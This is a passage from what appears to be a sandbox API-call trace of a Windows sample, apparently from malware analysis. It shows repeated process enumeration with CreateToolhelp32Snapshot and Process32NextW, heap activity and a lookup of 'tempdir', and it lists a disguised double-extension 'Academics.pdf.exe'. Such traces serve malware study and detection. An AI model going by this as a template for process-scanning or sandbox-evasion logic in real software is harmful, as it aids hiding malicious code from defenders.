lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0306.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0306.091] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0306.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0306.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0306.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0306.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0306.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0306.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0306.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0306.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0306.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0306.102] CloseHandle (hObject=0x294) returned 1 [0306.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0306.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0306.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0306.103] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0306.103] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0306.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0306.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0306.105] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0306.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0306.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0306.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0306.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0306.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0306.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0306.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0306.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0306.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0306.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0306.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0306.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0306.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0306.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0306.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0306.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0306.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0306.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0306.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0306.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0306.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0306.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0306.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0306.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0306.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0306.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0306.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0306.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0306.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0306.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0306.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0306.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.140] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0306.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0306.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0306.145] CloseHandle (hObject=0x294) returned 1 [0306.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0306.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0306.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0306.145] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0306.145] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0306.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0306.146] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0306.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0306.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0306.146] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0306.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0306.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0306.147] 